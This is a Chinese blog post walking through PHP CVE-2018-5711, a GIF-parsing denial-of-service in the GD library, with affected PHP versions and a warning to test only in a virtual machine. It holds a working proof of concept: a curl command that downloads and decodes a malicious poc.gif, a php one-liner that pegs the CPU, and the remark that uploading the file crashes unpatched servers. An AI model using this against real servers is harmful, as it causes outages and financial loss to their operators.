当前位置:首页 > 业界动态 > 正文内容

台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了

炫懿2年前 (2018-02-03)业界动态1093

华夏人才济济呀,台湾的黑客orange发现了一个漏洞,编号为PHP CVE-2018-5711,这个漏洞能瞬间让支持php的服务器宕机,我用KALI 2017.3的虚拟机来演示一下。


一、检测我的虚拟机是否装有php-gd库


1、运行命令:

php -m | grep -i gd

台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了 业界动态 第1张

2、如果上图中没有出现gd,我们就需要装一下了。运行命令

apt-get install php-gd。

台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了 业界动态 第2张

二、生成恶意的gif文件

1、

curl -L https://git.io/vN0n4 | xxd -r > poc.gif


台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了 业界动态 第3张


2、运行top命令看下我的CPU使用率

台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了 业界动态 第4张

3、测试恶意代码:

php -r 'imagecreatefromgif("poc.gif");'

台湾黑客发现一张动图能宕掉一台服务器,运维这个月又要忙了 业界动态 第5张


CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。


这个漏洞的影响版本范围如下:

PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1

  如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。


相关文章

[Android] 谷歌空间最新版-不root不fq下载使用谷歌商店版APP

[Android] 谷歌空间最新版-不root不fq下载使用谷歌商店版APP

谷歌空间  一个App完美解决谷歌安装器和网络加速器的全部需特点  自动配置谷歌框架  自带加速,不用fq(可以直接玩外服呀)  可以选择登录/注册谷歌账号,也...

[Android ] [教程]绕开华为通道,获取解锁码解锁BootLoader

[Android ] [教程]绕开华为通道,获取解锁码解锁BootLoader

绕开华为通道,获取解锁码解锁BootLoader刷机有风险,操作需谨慎,如果因为各种因素导致手机变砖无法开机,本教程概不负责,望悉知前言  因为华为官方在今年的七八月份吧,关闭了解锁码的申请...

国内外免费DNS域名解析服务汇总

国内外免费DNS域名解析服务汇总

  今天给大家整理一下国内外那些免费的DNS域名解析服务,希望对你有所帮助。  DNS域名解析服务并不只有一家,免费的DNS域名解析服务在国外也非常地常见,除了没有地理位置和线路识...

[Android] 微精灵1.60最新版破解方法

[Android] 微精灵1.60最新版破解方法

  用androidkill反编译后,通过查找注册失败信息,定位代码  将红框内的注册码判断代码注释掉  回编译,输入任意注册码注册  然后就没有了,至于软件,...

[Android]我的VR女友破解版

[Android]我的VR女友破解版

首先,说一下这款游戏不得不让我折服!玩了半小时实在是受不了了!此款游戏支持VR、有VR玩着更爽!!不多说、大家进游戏慢慢体验!破解内容:点击购买选择支付宝、千万别支付、这时候只需点击返回即可完成内购!...

国产流氓软件联盟大肆推广挖矿工具

国产流氓软件联盟大肆推广挖矿工具

  近日, 根据“火绒安全实验室”发出警报,一款名为“云计算”的软件,正通过各种流氓渠道大肆推广,该软件没有任何实质功能,只是一种纯粹的挖矿工具(生产“零币”)。  此外,一旦被植...

评论列表

姬长信
2年前 (2018-02-28)

https://blog.isoyu.com/archives/gongyiapi.html
大佬要不要帮写篇文章推广下✌

炫懿 回复:
讲真,我不是太懂API
2年前 (2018-03-30)
Gcod
2年前 (2018-02-14)

前排围观大佬

姬长信
2年前 (2018-02-08)

大佬大佬

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
召唤伊斯特瓦尔